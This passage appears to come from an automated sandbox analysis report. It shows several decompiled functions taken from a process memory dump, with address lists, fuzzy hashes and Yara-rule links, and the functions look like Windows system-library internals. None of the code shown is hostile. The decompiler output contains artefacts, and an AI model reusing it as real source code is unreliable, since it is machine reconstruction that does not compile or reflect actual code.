									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E02AB2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E02A96600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E02AB2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E02A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E02AB2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E02AB2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E02AB2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E02ADD0D1(_t62);
				goto L28;
			}

0x02ab2990
0x02ab2992
0x02ab2997
0x02ab29a3
0x02ab29a6
0x02ab29ab
0x02ab29ad
0x02ab29b2
0x02af5c80
0x02ab29b8
0x02ab29b8
0x02ab29bb
0x02ab29c0
0x02ab29c5
0x02ab29c6
0x02ab29c6
0x02ab29cb
0x00000000
0x00000000
0x02ab29cd
0x02ab29d0
0x02ab29d9
0x02ab29db
0x02ab29dd
0x02ab2a7f
0x02ab2a84
0x02ab2a87
0x02ab2a89
0x02af5ca1
0x02af5ca3
0x00000000
0x02ab2a8f
0x02ab2a8f
0x00000000
0x02ab2a8f
0x00000000
0x02ab29e3
0x02ab29e3
0x02ab29e3
0x00000000
0x02ab29e3
0x02ab29dd
0x00000000
0x02ab29db
0x02ab29e6
0x02ab29e9
0x02ab29eb
0x02ab29ed
0x02ab29f3
0x02ab29f5
0x02ab29f8
0x02ab29fa
0x02ab2a97
0x02ab2a9a
0x02ab2a9d
0x02ab2add
0x00000000
0x02ab2a9f
0x02ab2aa2
0x02ab2aa5
0x02ab2aa8
0x02ab2aab
0x02af5cab
0x02af5caf
0x02af5cc5
0x02af5cda
0x02af5cdc
0x02af5cdf
0x02af5ce5
0x00000000
0x02af5ceb
0x02af5ced
0x02af5cee
0x00000000
0x02af5cee
0x02af5cb1
0x02af5cb4
0x02af5cb9
0x02af5cbb
0x00000000
0x02af5cbd
0x02af5cbd
0x00000000
0x02af5cbd
0x02af5cbb
0x02ab2ab1
0x02ab2ab1
0x02ab2ac4
0x02ab2ac6
0x02ab2ac6
0x00000000
0x02ab2ac6
0x02ab2aab
0x00000000
0x02ab2a00
0x02ab2a09
0x02ab2a0e
0x02ab2a21
0x02ab2a24
0x02ab2a35
0x02ab2a3a
0x02ab2a3d
0x02ab2a42
0x02ab2a59
0x02ab2a59
0x02ab2a5c
0x02ab2a5f
0x02ab2a5f
0x02ab29fa
0x02ab29f3
0x02ab2a64
0x02ab2a64
0x02ab2a6b
0x02ab2a6b
0x02ab2a6d
0x02ab2a72
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa4322e6b5b0c0baca696a1761938813d412d67dc5292908c2491e7ca2e8f58f
Instruction ID: aeec8bcae97f8d50aeb3306d298065a6bd1aa524ad5155b6c4191f8d989bc34f
Opcode Fuzzy Hash: aa4322e6b5b0c0baca696a1761938813d412d67dc5292908c2491e7ca2e8f58f
Instruction Fuzzy Hash: 87517A71900209DFEF26DF95C980BDEBBBABF49314F10805AEC05AB261CB359952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02AB4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E02AB4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x2b7d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E02ACFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x2b77bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E02ACB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L02AA4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E02A8CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E02ACB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E02ACF380(_t67 + 0xc, 0x2a65138, 0x10) == 0) {
								 *0x2b760d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E02AB4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E02AB4E70(0x2b786b0, 0x2ab5690, 0, 0) != 0) {
					_t46 = E02A8CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x02ab4d3b
0x02ab4d4d
0x02ab4d53
0x02ab4d58
0x02ab4d65
0x02ab4d6c
0x02ab4d71
0x02ab4d77
0x02ab4d7f
0x02ab4d8c
0x02ab4d8e
0x02ab4dad
0x02ab4db0
0x02ab4db7
0x02ab4db8
0x02ab4db9
0x02ab4dba
0x02ab4dbb
0x02ab4dc1
0x02ab4dc8
0x02ab4dcc
0x02ab4dd5
0x02ab4dde
0x02ab4ddf
0x02ab4de0
0x02ab4de1
0x02ab4de6
0x02ab4de7
0x02ab4de9
0x02ab4df3
0x00000000
0x00000000
0x02af6c7c
0x02af6c8a
0x02af6c8a
0x02af6c9d
0x02af6ca7
0x02af6cac
0x02af6cb2
0x02af6cb9
0x00000000
0x02af6cbf
0x02af6cbf
0x00000000
0x02af6cbf
0x02af6cb9
0x02ab4dfb
0x02af6ccf
0x02af6cd3
0x02ab4e32
0x02ab4e39
0x02af6ce0
0x02af6cf2
0x02af6cf2
0x02af6ce0
0x02ab4e3f
0x02ab4e41
0x02ab4e51
0x02ab4e51
0x02ab4e03
0x02ab4e03
0x02ab4e09
0x02ab4e0f
0x02ab4e57
0x00000000
0x00000000
0x02ab4e1b
0x02ab4e30
0x02ab4e5b
0x02ab4e5b
0x00000000
0x02ab4e30
0x02ab4e11
0x02ab4e11
0x02ab4e16
0x00000000
0x02ab4e16
0x02ab4e01
0x00000000
0x02ab4e01
0x02ab4da5
0x02af6c6b
0x00000000
0x02ab4dab
0x02ab4dab
0x00000000
0x02ab4dab

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9617ff7d3754a307f35f41050088efcb8f837c4c92c58ba5f6e9029892cfaff
Instruction ID: b5282dc543cb56fb31f591557d186b5911a07f15e78e5296625ae1fcea1effe2
Opcode Fuzzy Hash: d9617ff7d3754a307f35f41050088efcb8f837c4c92c58ba5f6e9029892cfaff
Instruction Fuzzy Hash: 9241A275A40318AEEB229F14CD91BEBB7AEEF08714F04409AE9459B282DF74DD44CE91

Uniqueness

Uniqueness Score: -1.00%

Function 02A98A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E02A98A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x2b7d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E02ACB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E02A9E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x2a61180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E02AB1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E02AC3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E02A98999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x02a98a0a
0x02a98a1c
0x02a98a23
0x02a98a2e
0x02a98a30
0x02a98a36
0x02a98a3c
0x02a98a3e
0x02a98a4a
0x02a98a52
0x02a98a9c
0x02a98aae
0x02a98a58
0x02a98a5e
0x02a98a6a
0x02a98a6f
0x02a98a75
0x02a98a7d
0x02a98a85
0x02a98a86
0x02a98a89
0x02a98a93
0x02a98a99
0x02a98a9b
0x00000000
0x02a98aaf
0x02a98abe
0x02a98ac3
0x02a98acb
0x02a98ad7
0x02a98ae0
0x02a98af1
0x00000000
0x02a98af1
0x02a98acd
0x02a98ad5
0x02a98afb
0x02a98afd
0x02a98aff
0x02a98b07
0x02a98b22
0x02a98b24
0x02a98b2a
0x02a98b2e
0x02a98b3f
0x02a98b78
0x02a98b41
0x02a98b52
0x02a98b54
0x02a98b5c
0x02a98b74
0x02a98b74
0x02a98b5c
0x02a98b3f
0x02a98b5e
0x02a98b61
0x02a98b64
0x02a98b64
0x02a98b6c
0x02a98b6c
0x02a98b11
0x02ae9cd5
0x02ae9cd5
0x02a98b17
0x02a98b1a
0x02a98b1a
0x00000000
0x02a98ad5
0x02a98a89

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d36253ad978d910a501340a4c34cc09667d0e3357d58301fae7636e9ddfcf232
Instruction ID: c8bb0b29912beea8431c3b568464ee4a20e701ed34a8f916817dc60d6bc1cb9a
Opcode Fuzzy Hash: d36253ad978d910a501340a4c34cc09667d0e3357d58301fae7636e9ddfcf232
Instruction Fuzzy Hash: 3B417FB5A402289FDF24DF16CCC8BAAB3F9EB45300F1545EAD91997241EB749E84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02B069A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E02B069A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x2b7d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L02A96C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E02B06BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E02AC9980() >= 0) {
							E02AA2280(_t56, 0x2b78778);
							_t77 = 1;
							_t68 = 1;
							if( *0x2b78774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x2b78774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E02A8B6F0(0x2a6c338, 0x2a6c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E02AC9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E02AC95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E02A9FFB0(_t68, _t77, 0x2b78778);
				}
				_pop(_t78);
				return E02ACB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x02b069b5
0x02b069be
0x02b069c3
0x02b069c9
0x02b069cc
0x02b069d1
0x02b069d3
0x02b069de
0x02b069e1
0x02b069ea
0x02b069f6
0x02b069fe
0x02b06a13
0x02b06a14
0x02b06a15
0x02b06a16
0x02b06a1e
0x02b06a26
0x02b06a31
0x02b06a36
0x02b06a37
0x02b06a40
0x02b06a49
0x02b06a4a
0x02b06a53
0x02b06a59
0x02b06a5d
0x02b06a5e
0x02b06a64
0x02b06a67
0x02b06a6a
0x02b06a6d
0x02b06a70
0x02b06a77
0x02b06a7d
0x02b06a86
0x02b06a89
0x02b06a9c
0x02b06a9f
0x02b06aa2
0x02b06aa5
0x02b06aaf
0x02b06ab1
0x02b06ab8
0x02b06ab9
0x02b06abb
0x02b06abe
0x02b06ac5
0x02b06ac5
0x02b06aaf
0x02b06a40
0x02b06a26
0x02b069fe
0x02b06ace
0x02b06ad0
0x02b06ad3
0x02b06ad8
0x02b06adf
0x02b06adf
0x02b06ae8
0x02b06aef
0x02b06aef
0x02b06af9
0x02b06b06

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8241b36af483d953a9f489d95ce01d01daee1e2f8f768546ecf5a98d3e820a19
Instruction ID: 890d6e03e66431490f42aefdc29274d9ccd6764975f861028a9594d6cc6c94de
Opcode Fuzzy Hash: 8241b36af483d953a9f489d95ce01d01daee1e2f8f768546ecf5a98d3e820a19
Instruction Fuzzy Hash: 0C419AB1D40208AFDB11DFA5C980BFEBBF9EF48714F14856AE825A7290EB309945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02ABA61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E02ABA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x2b60220);
				E02ADD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x2b77b9c; // 0x0
				_t55 = L02AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E02ADD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x2b77b10 =  *0x2b77b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x2b7536c; // 0x2482110
					if( *_t51 != 0x2b75368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x2b75368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x2b7536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E02ABA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x02aba61c
0x02aba61e
0x02aba623
0x02aba628
0x02aba62b
0x02aba62d
0x02aba648
0x02aba64a
0x02aba64f
0x02af9b44
0x02aba6ec
0x02aba6f1
0x02aba6f1
0x02aba655
0x02aba657
0x02aba65a
0x02aba65d
0x02aba662
0x02aba663
0x02aba667
0x02aba668
0x02aba66d
0x02aba706
0x02aba706
0x02af9bda
0x02af9be6
0x02af9beb
0x00000000
0x02af9beb
0x02aba679
0x02af9b7a
0x00000000
0x02af9b7a
0x02aba683
0x02aba6f4
0x02aba6f7
0x02aba6f9
0x02aba6fd
0x02aba6a0
0x02aba6a0
0x02aba6ad
0x02aba6af
0x02aba6b4
0x02af9ba7
0x02af9bac
0x00000000
0x00000000
0x02af9bc6
0x02af9bce
0x02af9bd1
0x02af9bd3
0x02af9bd3
0x00000000
0x02af9bd1
0x02aba6bd
0x02aba6c3
0x02aba6c6
0x02aba6d2
0x02aba701
0x02aba704
0x00000000
0x02aba704
0x02aba6d4
0x02aba6d6
0x02aba6d9
0x02aba6db
0x02aba6e1
0x02aba6e6
0x02aba6e8
0x02aba6e8
0x02aba6ea
0x00000000
0x02aba6ea
0x02aba688
0x02aba692
0x02aba694
0x02aba699
0x00000000
0x00000000
0x02aba69d
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d58d0599cf26abddfb591796d47284240bd8768cda6edcd2ce5b8f8d3864fa
Instruction ID: 83414f2bf8bebce6c4ba4322e80e3247d6a7ddaccdf86cbfc887dd313cbe139c
Opcode Fuzzy Hash: 81d58d0599cf26abddfb591796d47284240bd8768cda6edcd2ce5b8f8d3864fa
Instruction Fuzzy Hash: FA415CB5A40205DFCB15CF68C5A0BA9B7F6FF49304F1580A9E905AB346DB74A941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02AC3D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AC3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E02A97B60(0, _t61, 0x2a611c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E02A97B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L02AA4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x02ac3d4c
0x02ac3d50
0x02ac3d55
0x02ac3d5e
0x02afe79a
0x00000000
0x02afe79a
0x02ac3d68
0x02afe789
0x02ac3d9d
0x02ac3da3
0x02ac3daf
0x02ac3db5
0x02ac3dbc
0x02ac3dc4
0x02ac3dc9
0x02ac3dce
0x02afe7ae
0x02afe7ae
0x02ac3dde
0x02ac3de2
0x02ac3de7
0x02ac3e0d
0x02ac3e13
0x02ac3e16
0x02ac3e1e
0x02ac3e25
0x02ac3e28
0x00000000
0x00000000
0x02ac3e2a
0x02ac3e2f
0x02ac3e37
0x02ac3e37
0x00000000
0x02ac3e37
0x02ac3e31
0x00000000
0x02ac3e31
0x02ac3e20
0x02ac3e20
0x02ac3e35
0x00000000
0x02ac3de9
0x02ac3de9
0x02ac3de9
0x02ac3dee
0x02ac3dfd
0x02ac3dff
0x02ac3e02
0x02ac3e05
0x02ac3e05
0x00000000
0x02ac3df0
0x02ac3de7
0x02afe78f
0x02afe794
0x02ac3d79
0x02ac3d84
0x02ac3d89
0x02ac3d8e
0x00000000
0x02afe7a4
0x02ac3d96
0x02ac3d9a
0x00000000
0x02ac3d9a
0x00000000
0x02afe794
0x02ac3d6e
0x02ac3d73
0x00000000
0x02afe7b5
0x00000000

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 254e5718758429b5a93f346d5c81969aed85373a3bcffac670a775800e67cb3e
Instruction ID: afc8dc826e749eaf0f5ffbb7304652363fe719c6223a91afb99de2aeafd08b36
Opcode Fuzzy Hash: 254e5718758429b5a93f346d5c81969aed85373a3bcffac670a775800e67cb3e
Instruction Fuzzy Hash: 6C31AF71600614DBCB258F2AC981A7ABBF5EF49710725C4AEF946CB360EF34D841CB90

Uniqueness

Uniqueness Score: -1.00%

